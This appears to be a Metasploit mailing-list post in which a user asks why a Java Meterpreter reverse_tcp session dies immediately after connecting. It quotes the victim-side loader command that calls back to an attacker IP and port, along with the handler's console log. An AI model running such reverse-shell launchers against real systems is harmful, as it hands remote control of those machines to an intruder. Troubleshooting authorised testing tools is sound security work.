Metasploit mailing list archives

Meterpreter session 2 closed. Reason: Died


From: Jeffs <jeffs () speakeasy net>
Date: Sun, 17 Oct 2010 17:47:59 -0400

 Hello All,

when running loader.jar on a victim machine as such:

java -jar loader.jar 192.168.1.101 4444

and having set up java/meterpreter/reverse_tcp  on the attacker as such:

Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...


I see this connection on the attacker, then it immediately dies, as such:

Sending stage (26938 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.101:4444 -> 192.168.1.100:2688) at Sun Oct 17 17:42:03 -0400 2010
[*] Meterpreter session 2 closed.  Reason: Died


Any clues as to what might be wrong here would be appreciated.

Thank you.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: